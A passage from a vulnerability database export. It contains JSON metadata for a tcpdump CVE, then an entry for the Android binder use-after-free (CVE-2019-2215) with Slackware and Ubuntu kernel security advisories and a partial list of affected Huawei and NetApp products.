        "url": "https://access.redhat.com/security/cve/cve-2020-2574"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-17546"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10751"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-3884"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10763"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10942"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19062"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19046"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12465"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19447"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25696"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-16231"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14381"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19056"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19524"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8648"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12770"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19767"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19533"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19537"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-2922"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-16167"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-9455"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-11565"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19332"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-12614"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19063"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19319"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8563"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10732"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3898"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2020:5634"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25705"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-6829"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12403"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3156"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20206"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14351"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12321"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-14559"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-29661"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12400"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:0799"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9283"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-147185"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-15166"
      },
      {
        "db": "PACKETSTORM",
        "id": "160624"
      },
      {
        "db": "PACKETSTORM",
        "id": "154710"
      },
      {
        "db": "PACKETSTORM",
        "id": "154931"
      },
      {
        "db": "PACKETSTORM",
        "id": "161546"
      },
      {
        "db": "PACKETSTORM",
        "id": "161742"
      },
      {
        "db": "PACKETSTORM",
        "id": "159874"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-129"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010148"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-15166"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-147185"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-15166"
      },
      {
        "db": "PACKETSTORM",
        "id": "160624"
      },
      {
        "db": "PACKETSTORM",
        "id": "154710"
      },
      {
        "db": "PACKETSTORM",
        "id": "154931"
      },
      {
        "db": "PACKETSTORM",
        "id": "161546"
      },
      {
        "db": "PACKETSTORM",
        "id": "161742"
      },
      {
        "db": "PACKETSTORM",
        "id": "159874"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-129"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010148"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-15166"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-147185"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-15166"
      },
      {
        "date": "2020-12-18T19:14:41",
        "db": "PACKETSTORM",
        "id": "160624"
      },
      {
        "date": "2019-10-02T15:03:37",
        "db": "PACKETSTORM",
        "id": "154710"
      },
      {
        "date": "2019-10-21T19:33:33",
        "db": "PACKETSTORM",
        "id": "154931"
      },
      {
        "date": "2021-02-25T15:29:25",
        "db": "PACKETSTORM",
        "id": "161546"
      },
      {
        "date": "2021-03-10T16:02:43",
        "db": "PACKETSTORM",
        "id": "161742"
      },
      {
        "date": "2020-11-04T15:32:37",
        "db": "PACKETSTORM",
        "id": "159874"
      },
      {
        "date": "2019-10-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201910-129"
      },
      {
        "date": "2019-10-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-010148"
      },
      {
        "date": "2019-10-03T17:15:11.050000",
        "db": "NVD",
        "id": "CVE-2019-15166"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-01-20T00:00:00",
        "db": "VULHUB",
        "id": "VHN-147185"
      },
      {
        "date": "2022-04-13T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-15166"
      },
      {
        "date": "2022-04-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201910-129"
      },
      {
        "date": "2019-10-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-010148"
      },
      {
        "date": "2025-12-03T19:15:49.470000",
        "db": "NVD",
        "id": "CVE-2019-15166"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "160624"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-129"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "tcpdump Input validation vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010148"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-129"
      }
    ],
    "trust": 0.6
  }
}

VAR-201910-0902

Vulnerability from variot - Updated: 2025-11-18 12:23

A use-after-free in binder.c allows an elevation of privilege from an application to the Linux Kernel. No user interaction is required to exploit this vulnerability, however exploitation does require either the installation of a malicious local application or a separate vulnerability in a network facing application.Product: AndroidAndroid ID: A-141720095. Android Contains a vulnerability in the use of freed memory. This vulnerability Android ID: A-141720095 It is published asInformation is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

[slackware-security] Slackware 14.2 kernel (SSA:2019-311-01)

New kernel packages are available for Slackware 14.2 to fix security issues.

Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/linux-4.4.199/: Upgraded. These updates fix various bugs and security issues. Be sure to upgrade your initrd after upgrading the kernel packages. If you use lilo to boot your machine, be sure lilo.conf points to the correct kernel and initrd and run lilo as root to update the bootloader. If you use elilo to boot your machine, you should run eliloconfig to copy the kernel and initrd to the EFI System Partition. For more information, see: Fixed in 4.4.191: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3900 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15118 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10906 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10905 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10638 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15117 Fixed in 4.4.193: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14835 Fixed in 4.4.194: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14816 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14814 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15505 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14821 Fixed in 4.4.195: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17053 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17052 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17056 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17055 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17054 Fixed in 4.4.196: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2215 Fixed in 4.4.197: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16746 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20976 Fixed in 4.4.198: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17075 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17133 Fixed in 4.4.199: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15098 ( Security fix *) +--------------------------+

Where to find the new packages: +-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

MD5 signatures: +-------------+

Slackware 14.2 packages:

Installation instructions: +------------------------+

Upgrade the packages as root:

upgradepkg kernel-*.txz

If you are using an initrd, you'll need to rebuild it.

For a 32-bit SMP machine, use this command (substitute the appropriate kernel version if you are not running Slackware 14.2):

/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199-smp | bash

For a 64-bit machine, or a 32-bit uniprocessor machine, use this command (substitute the appropriate kernel version if you are not running Slackware 14.2):

/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199 | bash

If you are using lilo or elilo to boot the machine, you'll need to ensure that the machine is properly prepared before rebooting.

If using elilo: Ensure that the /boot/vmlinuz symlink is pointing to the kernel you wish to use, and then run eliloconfig to update the EFI System Partition.

+-----+

Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com

+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. | +------------------------------------------------------------------------+ -----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAl3Ej4wACgkQakRjwEAQIjPBGgCbBvQSowDI1fl2+9FnjAuXifIV qp4AoIBHeQ0arALUOqrVAfv+sZvRsiwu =/1NF -----END PGP SIGNATURE----- . ========================================================================== Ubuntu Security Notice USN-4186-3 November 13, 2019

linux vulnerability

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 16.04 LTS

Summary:

Several security issues were fixed in the Linux kernel. It was discovered that the kernel fix for CVE-2019-0155 (i915 missing Blitter Command Streamer check) was incomplete on 64-bit Intel x86 systems. This update addresses the issue.

We apologize for the inconvenience.

Original advisory details:

Stephan van Schaik, Alyssa Milburn, Sebastian \xd6sterlund, Pietro Frigo, Kaveh Razavi, Herbert Bos, Cristiano Giuffrida, Giorgi Maisuradze, Moritz Lipp, Michael Schwarz, Daniel Gruss, and Jo Van Bulck discovered that Intel processors using Transactional Synchronization Extensions (TSX) could expose memory contents previously stored in microarchitectural buffers to a malicious process that is executing on the same CPU core. A local attacker could use this to expose sensitive information. (CVE-2019-11135)

It was discovered that the Intel i915 graphics chipsets allowed userspace to modify page table entries via writes to MMIO from the Blitter Command Streamer and expose kernel memory information. A local attacker could use this to expose sensitive information or possibly elevate privileges. (CVE-2019-0155)

Deepak Gupta discovered that on certain Intel processors, the Linux kernel did not properly perform invalidation on page table updates by virtual guest operating systems. A local attacker in a guest VM could use this to cause a denial of service (host system crash). (CVE-2018-12207)

It was discovered that the Intel i915 graphics chipsets could cause a system hang when userspace performed a read from GT memory mapped input output (MMIO) when the product is in certain low power states. A local attacker could use this to cause a denial of service. (CVE-2019-0154)

Hui Peng discovered that the Atheros AR6004 USB Wi-Fi device driver for the Linux kernel did not properly validate endpoint descriptors returned by the device. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-15098)

It was discovered that a buffer overflow existed in the 802.11 Wi-Fi configuration interface for the Linux kernel when handling beacon settings. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-16746)

Ori Nimron discovered that the AX25 network protocol implementation in the Linux kernel did not properly perform permissions checks. A local attacker could use this to create a raw socket. (CVE-2019-17052)

Ori Nimron discovered that the IEEE 802.15.4 Low-Rate Wireless network protocol implementation in the Linux kernel did not properly perform permissions checks. A local attacker could use this to create a raw socket. (CVE-2019-17053)

Ori Nimron discovered that the Appletalk network protocol implementation in the Linux kernel did not properly perform permissions checks. A local attacker could use this to create a raw socket. (CVE-2019-17054)

Ori Nimron discovered that the modular ISDN network protocol implementation in the Linux kernel did not properly perform permissions checks. A local attacker could use this to create a raw socket. (CVE-2019-17055)

Ori Nimron discovered that the Near field Communication (NFC) network protocol implementation in the Linux kernel did not properly perform permissions checks. A local attacker could use this to create a raw socket. (CVE-2019-17056)

Nico Waisman discovered that a buffer overflow existed in the Realtek Wi-Fi driver for the Linux kernel when handling Notice of Absence frames. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-17666)

Maddie Stone discovered that the Binder IPC Driver implementation in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-2215)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 16.04 LTS: linux-image-4.4.0-169-generic 4.4.0-169.198 linux-image-4.4.0-169-generic-lpae 4.4.0-169.198 linux-image-4.4.0-169-lowlatency 4.4.0-169.198 linux-image-generic 4.4.0.169.177 linux-image-generic-lpae 4.4.0.169.177 linux-image-lowlatency 4.4.0.169.177 linux-image-virtual 4.4.0.169.177

Please note that mitigating the TSX (CVE-2019-11135) and i915 (CVE-2019-0154) issues requires corresponding microcode and graphics firmware updates respectively.

After a standard system update you need to reboot your computer to make all the necessary changes.

References: https://usn.ubuntu.com/4186-3 https://usn.ubuntu.com/4186-1 CVE-2019-0155, https://bugs.launchpad.net/bugs/1852141

Package Information: https://launchpad.net/ubuntu/+source/linux/4.4.0-169.198

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201910-0902",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "nova 3",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.351\\(c00e351r1p1t8\\)"
      },
      {
        "model": "florida-l21",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.154\\(c605e7r1p2t8\\)"
      },
      {
        "model": "p20 lite",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.200\\(c635e5r1p1t8\\)"
      },
      {
        "model": "a320",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "sydneym-al00",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.212\\(c00e62r1p7t8\\)"
      },
      {
        "model": "leland-tl10c",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.130\\(c01e112r2p10t8\\)"
      },
      {
        "model": "florida-l22",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.150\\(c636e6r1p5t8\\)"
      },
      {
        "model": "mate rs",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.321\\(c786e320r1p1t8\\)"
      },
      {
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "anne-al00",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.126\\(c00e126r1p7t8\\)"
      },
      {
        "model": "florida-al20b",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.128\\(c00e112r1p6t8\\)"
      },
      {
        "model": "p20 lite",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.200\\(c636e4r1p5t8\\)"
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "google",
        "version": null
      },
      {
        "model": "nova 3e",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.200\\(c636e4r1p5t8\\)"
      },
      {
        "model": "princeton-al10b",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "10.1.0.160\\(c00e160r2p11\\)"
      },
      {
        "model": "nova 2s",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.210\\(c01e110r1p9t8\\)"
      },
      {
        "model": "fas2750",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "lelandp-al00c",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.130\\(c00e112r2p10t8\\)"
      },
      {
        "model": "leland-al10b",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.130\\(c00e112r2p10t8\\)"
      },
      {
        "model": "leland-tl10b",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.130\\(c01e112r2p10t8\\)"
      },
      {
        "model": "honor view 20",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "10.1.0.214\\(c10e5r4p3\\)"
      },
      {
        "model": "johnson-tl00d",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.219\\(c01e18r3p2t8\\)"
      },
      {
        "model": "berkeley-l09",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.351\\(c432e5r1p13t8\\)"
      },
      {
        "model": "yale-tl00b",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "10.1.0.160\\(c01e160r8p12\\)"
      },
      {
        "model": "tony-al00b",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "10.0.0.175\\(c00e59r2p11\\)"
      },
      {
        "model": "solidfire baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "tony-tl00b",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "10.0.0.175\\(c01e59r2p11\\)"
      },
      {
        "model": "ares-al00b",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.165\\(c00e165r2p5t8\\)"
      },
      {
        "model": "p20 lite",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.200\\(c605e4r1p3t8\\)"
      },
      {
        "model": "c190",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "bla-l29c",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.300\\(c432e4r1p11t8\\)"
      },
      {
        "model": "ares-al10d",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.165\\(c00e165r2p5t8\\)"
      },
      {
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "bla-al00b",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "10.0.0.170\\(c786e170r2p4\\)"
      },
      {
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "duke-l09i",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.0.1.171\\(c675e6r1p5t8\\)"
      },
      {
        "model": "berkeley-tl10",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.333\\(c01e333r1p1t8\\)"
      },
      {
        "model": "lelandp-l22c",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.156\\(c636e5r1p5t8\\)"
      },
      {
        "model": "yale-l21a",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "10.1.0.231\\(c10e3r3p2\\)"
      },
      {
        "model": "p20 lite",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.201\\(c636e4r1p5t8\\)"
      },
      {
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "florida-tl10b",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.128\\(c01e112r1p6t8\\)"
      },
      {
        "model": "service processor",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "a800",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "ares-tl00chw",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "8.2.0.163\\(c01r2p1\\)"
      },
      {
        "model": "nova 3e",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.201\\(c636e4r1p5t8\\)"
      },
      {
        "model": "figo-al00a",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.130\\(c00e115r2p8t8\\)"
      },
      {
        "model": "columbia-al00a",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "8.1.0.186\\(c00gt\\)"
      },
      {
        "model": "dura-al00a",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "1.0.0.190\\(c00\\)"
      },
      {
        "model": "p20 lite",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.246\\(c432e6r1p7t8\\)"
      },
      {
        "model": "stanford-l09",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.211\\(c635e2r1p4t8\\)"
      },
      {
        "model": "p20 lite",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.201\\(zafc185e4r1p8t8\\)"
      },
      {
        "model": "columbia-l29d",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.325\\(c432e4r1p12t8\\)"
      },
      {
        "model": "jakarta-al00a",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.260\\(c00e120r2p2\\)"
      },
      {
        "model": "rhone-al00",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "8.0.0.376\\(c00\\)"
      },
      {
        "model": "nova 3e",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.201\\(zafc185e4r1p8t8\\)"
      },
      {
        "model": "alp-tl00b",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "10.0.0.162\\(c01e156r1p4\\)"
      },
      {
        "model": "h610s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "alp-al00b",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "10.0.0.162\\(c00e156r2p4\\)"
      },
      {
        "model": "yale-al00a",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "10.1.0.160\\(c00e160r8p12\\)"
      },
      {
        "model": "steelstore cloud integrated storage",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "sydney-al00",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.212\\(c00e62r1p7t8\\)"
      },
      {
        "model": "cornell-tl10b",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.321\\(c01e320r1p1t8\\)"
      },
      {
        "model": "sydney-tl00",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.212\\(c01e62r1p7t8\\)"
      },
      {
        "model": "data availability services",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h410c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "florida-l03",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.154\\(c605e7r1p2t8\\)"
      },
      {
        "model": "honor 9i",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.130\\(c00e112r2p10t8\\)"
      },
      {
        "model": "bla-tl00b",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
